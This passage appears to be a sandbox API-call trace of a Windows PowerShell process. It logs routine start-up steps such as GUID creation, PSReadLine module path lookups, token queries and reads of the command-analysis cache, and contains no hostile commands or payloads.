ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0285.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef875c0) returned 1 [0285.423] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x3bf2d5fb, Data2=0x95ca, Data3=0x462c, Data4=([0]=0x98, [1]=0xdc, [2]=0x7c, [3]=0xf1, [4]=0x41, [5]=0x27, [6]=0x2c, [7]=0x4f))) returned 0x0 [0285.429] EtwEventRegister () returned 0x0 [0285.430] EtwEventSetInformation () returned 0x0 [0285.440] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x462e6bfe, Data2=0x2b7, Data3=0x4c76, Data4=([0]=0x97, [1]=0x80, [2]=0xac, [3]=0x40, [4]=0xe5, [5]=0x89, [6]=0x56, [7]=0x95))) returned 0x0 [0285.441] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xcf4a445e, Data2=0x39fe, Data3=0x4ce1, Data4=([0]=0xa9, [1]=0xe5, [2]=0xfa, [3]=0x3c, [4]=0x3a, [5]=0x5b, [6]=0x70, [7]=0x25))) returned 0x0 [0285.442] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xe39489ea, Data2=0xe46, Data3=0x46eb, Data4=([0]=0xb0, [1]=0x52, [2]=0x17, [3]=0xd7, [4]=0x4, [5]=0x9d, [6]=0xf2, [7]=0x5b))) returned 0x0 [0285.529] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x64ad6456, Data2=0xda76, Data3=0x4566, Data4=([0]=0xbd, [1]=0xdd, [2]=0x98, [3]=0xfc, [4]=0xef, [5]=0xa1, [6]=0x4f, [7]=0x72))) returned 0x0 [0285.561] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0xbcfd0b96, Data2=0xbd61, Data3=0x4c7f, Data4=([0]=0xa3, [1]=0x4, [2]=0xeb, [3]=0x39, [4]=0xfe, [5]=0x7d, [6]=0xe8, [7]=0x93))) returned 0x0 [0285.565] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0xe5bde146, Data2=0x25a7, Data3=0x41af, Data4=([0]=0xb1, [1]=0xf2, [2]=0xcf, [3]=0x3a, [4]=0xe, [5]=0x8a, [6]=0x99, [7]=0x9b))) returned 0x0 [0285.565] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x29092d4d, Data2=0x809a, Data3=0x4db9, Data4=([0]=0xab, [1]=0xa4, [2]=0x22, [3]=0x7e, [4]=0x1f, [5]=0xaa, [6]=0xa8, [7]=0x5e))) returned 0x0 [0285.565] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x30ab4b25, Data2=0x175c, Data3=0x4950, Data4=([0]=0x98, [1]=0x96, [2]=0xc, [3]=0x7e, [4]=0x90, [5]=0x9, [6]=0x34, [7]=0x8f))) returned 0x0 [0285.565] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xc5056cc4, Data2=0x5811, Data3=0x4697, Data4=([0]=0xb0, [1]=0x82, [2]=0xc2, [3]=0x44, [4]=0x9f, [5]=0xd5, [6]=0x17, [7]=0x7a))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x9ffc962c, Data2=0xf9f1, Data3=0x4c14, Data4=([0]=0x97, [1]=0x92, [2]=0xfc, [3]=0x18, [4]=0x31, [5]=0xbb, [6]=0xe1, [7]=0x34))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xb279f5bf, Data2=0x4750, Data3=0x4f44, Data4=([0]=0x8d, [1]=0xdc, [2]=0x1b, [3]=0x3c, [4]=0x5f, [5]=0xc0, [6]=0xad, [7]=0x49))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x73416e7e, Data2=0x57a6, Data3=0x4c38, Data4=([0]=0xa8, [1]=0x7d, [2]=0xbe, [3]=0xdf, [4]=0xbe, [5]=0xc3, [6]=0xa1, [7]=0xe7))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x7bd305d4, Data2=0xc112, Data3=0x40c8, Data4=([0]=0x8a, [1]=0x76, [2]=0x3c, [3]=0x48, [4]=0xe2, [5]=0x3, [6]=0xfa, [7]=0xda))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x5abea977, Data2=0x5284, Data3=0x4b5a, Data4=([0]=0xa1, [1]=0x5f, [2]=0x20, [3]=0x35, [4]=0x28, [5]=0xca, [6]=0xcb, [7]=0xa3))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xd07f487e, Data2=0xc1f, Data3=0x443e, Data4=([0]=0x80, [1]=0x69, [2]=0xeb, [3]=0x44, [4]=0x1f, [5]=0x7f, [6]=0xf4, [7]=0x38))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x37598757, Data2=0xa6f4, Data3=0x4be9, Data4=([0]=0x88, [1]=0x34, [2]=0xf7, [3]=0x1, [4]=0xf0, [5]=0x87, [6]=0x39, [7]=0xf7))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x7c162215, Data2=0xcd4c, Data3=0x4dda, Data4=([0]=0x9f, [1]=0x97, [2]=0x31, [3]=0xb0, [4]=0xf6, [5]=0x6d, [6]=0xe6, [7]=0xbb))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xc05fac77, Data2=0x8b70, Data3=0x49f0, Data4=([0]=0x89, [1]=0xba, [2]=0x5d, [3]=0x2c, [4]=0x8a, [5]=0x58, [6]=0x31, [7]=0x61))) returned 0x0 [0285.566] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xf2c2b518, Data2=0xe227, Data3=0x4ffe, Data4=([0]=0x99, [1]=0x2f, [2]=0x5c, [3]=0xd1, [4]=0xc1, [5]=0x97, [6]=0x3, [7]=0xda))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xd185e36d, Data2=0xa7b, Data3=0x4be3, Data4=([0]=0x87, [1]=0xe3, [2]=0x9c, [3]=0x19, [4]=0x1b, [5]=0x8f, [6]=0xf, [7]=0x78))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xca385dfa, Data2=0x1fe3, Data3=0x4c0a, Data4=([0]=0x9c, [1]=0xe, [2]=0x67, [3]=0x4c, [4]=0x9, [5]=0xa, [6]=0x4d, [7]=0x3b))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xae3c9afc, Data2=0x5745, Data3=0x41fe, Data4=([0]=0x85, [1]=0xa1, [2]=0x4b, [3]=0x1e, [4]=0x19, [5]=0x8f, [6]=0x0, [7]=0x8d))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xe1bd992b, Data2=0x9fb7, Data3=0x4e2d, Data4=([0]=0x89, [1]=0x51, [2]=0x65, [3]=0x25, [4]=0x49, [5]=0xd7, [6]=0xe0, [7]=0xbc))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xe9ad929c, Data2=0xf6a4, Data3=0x4d6b, Data4=([0]=0x80, [1]=0x15, [2]=0xbd, [3]=0xdd, [4]=0xc7, [5]=0x8e, [6]=0x58, [7]=0x74))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x93130642, Data2=0x942, Data3=0x4289, Data4=([0]=0xaf, [1]=0x48, [2]=0x22, [3]=0x2a, [4]=0x93, [5]=0x4e, [6]=0x0, [7]=0x8))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xd67d7ffc, Data2=0x27f1, Data3=0x42ff, Data4=([0]=0x9b, [1]=0x59, [2]=0x63, [3]=0x67, [4]=0x84, [5]=0x1c, [6]=0x77, [7]=0x52))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x189d8a06, Data2=0x75a1, Data3=0x41ba, Data4=([0]=0x97, [1]=0x45, [2]=0x24, [3]=0x6d, [4]=0xf7, [5]=0x2c, [6]=0x5f, [7]=0xb8))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x364384c5, Data2=0xc990, Data3=0x44cd, Data4=([0]=0xb9, [1]=0x1b, [2]=0xfd, [3]=0x8b, [4]=0x51, [5]=0xde, [6]=0xc5, [7]=0xec))) returned 0x0 [0285.567] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xe7cc9efa, Data2=0x311d, Data3=0x4ff3, Data4=([0]=0x86, [1]=0xc4, [2]=0x4b, [3]=0x1b, [4]=0x93, [5]=0x31, [6]=0x32, [7]=0x6))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xe25d4974, Data2=0x1cfe, Data3=0x4a45, Data4=([0]=0xa3, [1]=0xf2, [2]=0x91, [3]=0x4f, [4]=0xc0, [5]=0xfa, [6]=0x15, [7]=0x96))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x5b674900, Data2=0xbff4, Data3=0x469a, Data4=([0]=0x87, [1]=0xb0, [2]=0x63, [3]=0x39, [4]=0x17, [5]=0x39, [6]=0x92, [7]=0xb9))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x4c2fafa5, Data2=0xd9f9, Data3=0x477b, Data4=([0]=0x92, [1]=0xdb, [2]=0x6e, [3]=0x29, [4]=0x69, [5]=0x71, [6]=0xd7, [7]=0xdd))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0xb453971e, Data2=0x4af7, Data3=0x4ad8, Data4=([0]=0x8d, [1]=0xa5, [2]=0xa1, [3]=0xab, [4]=0x7, [5]=0xa0, [6]=0xc0, [7]=0x1a))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x675b7614, Data2=0xf91f, Data3=0x49cc, Data4=([0]=0xb9, [1]=0xb4, [2]=0xbc, [3]=0xf3, [4]=0xd0, [5]=0xa8, [6]=0xc, [7]=0xc3))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef879a8 | out: pguid=0x653ef879a8*(Data1=0x8e35568d, Data2=0xc6b5, Data3=0x4759, Data4=([0]=0xad, [1]=0x9b, [2]=0xbd, [3]=0xb1, [4]=0xeb, [5]=0xbf, [6]=0x37, [7]=0xbe))) returned 0x0 [0285.568] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x719f8f41, Data2=0x40d5, Data3=0x467a, Data4=([0]=0x8f, [1]=0x68, [2]=0xe2, [3]=0x12, [4]=0x3c, [5]=0xd1, [6]=0x77, [7]=0xdb))) returned 0x0 [0285.569] CoCreateGuid (in: pguid=0x653ef87978 | out: pguid=0x653ef87978*(Data1=0x36084e6b, Data2=0xac39, Data3=0x4390, Data4=([0]=0x94, [1]=0xdd, [2]=0x7b, [3]=0x6, [4]=0xef, [5]=0xeb, [6]=0x93, [7]=0x6f))) returned 0x0 [0285.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x653ef87630, nSize=0xfa | out: lpBuffer="") returned 0x0 [0285.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x105, lpBuffer=0x653ef884a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0285.572] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x105, lpBuffer=0x653ef88360, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0285.620] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x25b73f5c3b0*=0x98c, lpdwindex=0x653ef860c4 | out: lpdwindex=0x653ef860c4) returned 0x0 [0285.747] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x105, lpBuffer=0x653ef88510, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0285.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x105, lpBuffer=0x653ef882a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0286.104] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1")) returned 0x20 [0286.104] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7d3b0 [0286.104] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7d3b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.105] CoTaskMemFree (pv=0x25b73f7d3b0) [0286.107] CoTaskMemAlloc (cb=0x20c) returned 0x25b73f7fe30 [0286.107] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73f7fe30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0286.107] CoTaskMemFree (pv=0x25b73f7fe30) [0286.107] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8ab40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0286.108] GetCurrentProcess () returned 0xffffffffffffffff [0286.108] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8aff8 | out: TokenHandle=0x653ef8aff8*=0xb30) returned 1 [0286.108] GetTokenInformation (in: TokenHandle=0xb30, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8b0f8 | out: TokenInformation=0x0, ReturnLength=0x653ef8b0f8) returned 0 [0286.108] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73f7a8c0 [0286.108] GetTokenInformation (in: TokenHandle=0xb30, TokenInformationClass=0x1, TokenInformation=0x25b73f7a8c0, TokenInformationLength=0x2c, ReturnLength=0x653ef8b0f8 | out: TokenInformation=0x25b73f7a8c0, ReturnLength=0x653ef8b0f8) returned 1 [0286.109] LocalFree (hMem=0x25b73f7a8c0) returned 0x0 [0286.110] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1d04b8, cbSid=0x653ef8b0f0 | out: pSid=0x25b5c1d04b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8b0f0) returned 1 [0286.110] CreateMutexW (lpMutexAttributes=0x25b5c1d0608, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa5c [0286.110] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8af90*=0xa5c, lpdwindex=0x653ef8ad64 | out: lpdwindex=0x653ef8ad64) returned 0x0 [0286.110] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f80490 [0286.110] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f80490, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.110] CoTaskMemFree (pv=0x25b73f80490) [0286.111] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", nBufferLength=0x105, lpBuffer=0x653ef8ac50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0286.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b0e0) returned 1 [0286.111] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c1d0c50 | out: lpFileInformation=0x25b5c1d0c50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0286.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b0a0) returned 1 [0286.111] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8ab80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0286.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8afd0) returned 1 [0286.111] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b0b0 | out: lpFileInformation=0x653ef8b0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0286.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8af90) returned 1 [0286.112] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cbd9994f-573e-4e2a-b89c-2361e1f3e1c9", nBufferLength=0x105, lpBuffer=0x653ef8aa30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cbd9994f-573e-4e2a-b89c-2361e1f3e1c9", lpFilePart=0x0) returned 0x93 [0286.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8af10) returned 1 [0286.112] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cbd9994f-573e-4e2a-b89c-2361e1f3e1c9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_cbd9994f-573e-4e2a-b89c-2361e1f3e1c9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xb10 [0286.112] GetFileType (hFile=0xb10) returned 0x1 [0286.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ae80) returned 1 [0286.112] GetFileType (hFile=0xb10) returned 0x1 [0286.112] ReadFile (in: hFile=0xb10, lpBuffer=0x25b5c1d1ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ad78, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1d1ed8*, lpNumberOfBytesRead=0x653ef8ad78*=0x46d, lpOverlapped=0x0) returned 1 [0286.119] ReadFile (in: hFile=0xb10, lpBuffer=0x25b5c1d1ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ad48, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1d1ed8*, lpNumberOfBytesRead=0x653ef8ad48*=0x0, lpOverlapped=0x0) returned 1 [0286.119] CloseHandle (hObject=0xb10) returned 1 [0286.119] ReleaseMutex (hMutex=0xa5c) returned 1 [0286.121] CoTaskMemAlloc (cb=0x20c) returned 0x25b73f83350 [0286.121] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73f83350 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0286.121] CoTaskMemFree (pv=0x25b73f83350) [0286.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0286.121] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f806b0 [0286.121] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f806b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.121] CoTaskMemFree (pv=0x25b73f806b0) [0286.121] CoTaskMemAlloc (cb=0x20c) returned 0x25b73f83350 [0286.121] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73f83350 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0286.121] CoTaskMemFree (pv=0x25b73f83350) [0286.121] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0286.122] GetCurrentProcess () returned 0xffffffffffffffff [0286.122] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c9e8 | out: TokenHandle=0x653ef8c9e8*=0xb10) returned 1 [0286.122] GetTokenInformation (in: TokenHandle=0xb10, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x0, ReturnLength=0x653ef8cae8) returned 0 [0286.122] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73f7b600 [0286.122] GetTokenInformation (in: TokenHandle=0xb10, TokenInformationClass=0x1, TokenInformation=0x25b73f7b600, TokenInformationLength=0x2c, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x25b73f7b600, ReturnLength=0x653ef8cae8) returned 1 [0286.123] LocalFree (hMem=0x25b73f7b600) returned 0x0 [0286.123] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1dc680, cbSid=0x653ef8cae0 | out: pSid=0x25b5c1dc680*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cae0) returned 1 [0286.124] CreateMutexW (lpMutexAttributes=0x25b5c1dc7d0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xb40 [0286.124] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8c980*=0xb40, lpdwindex=0x653ef8c754 | out: lpdwindex=0x653ef8c754) returned 0x0 [0286.124] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7fe30 [0286.124] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7fe30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.124] CoTaskMemFree (pv=0x25b73f7fe30) [0286.124] ReleaseMutex (hMutex=0xb40) returned 1 [0286.125] GetCurrentProcess () returned 0xffffffffffffffff [0286.125] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8cb18 | out: TokenHandle=0x653ef8cb18*=0xa98) returned 1 [0286.125] GetTokenInformation (in: TokenHandle=0xa98, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x0, ReturnLength=0x653ef8cc18) returned 0 [0286.125] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73f7a8c0 [0286.125] GetTokenInformation (in: TokenHandle=0xa98, TokenInformationClass=0x1, TokenInformation=0x25b73f7a8c0, TokenInformationLength=0x2c, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x25b73f7a8c0, ReturnLength=0x653ef8cc18) returned 1 [0286.126] LocalFree (hMem=0x25b73f7a8c0) returned 0x0 [0286.126] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c1dd7c0, cbSid=0x653ef8cc10 | out: pSid=0x25b5c1dd7c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cc10) returned 1 [0286.126] CreateMutexW (lpMutexAttributes=0x25b5c1dd910, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xab8 [0286.126] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8cab0*=0xab8, lpdwindex=0x653ef8c884 | out: lpdwindex=0x653ef8c884) returned 0x0 [0286.127] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7fe30 [0286.127] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7fe30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.127] CoTaskMemFree (pv=0x25b73f7fe30) [0286.127] CoCreateGuid (in: pguid=0x653ef8cc28 | out: pguid=0x653ef8cc28*(Data1=0xfc085d15, Data2=0x6209, Data3=0x49f0, Data4=([0]=0x96, [1]=0x4b, [2]=0x3, [3]=0x99, [4]=0xd4, [5]=0x70, [6]=0x37, [7]=0xa7))) returned 0x0 [0286.127] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0286.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cb40) returned 1 [0286.127] GetFileAttributesExW (in: lpFileName="C:\\Program 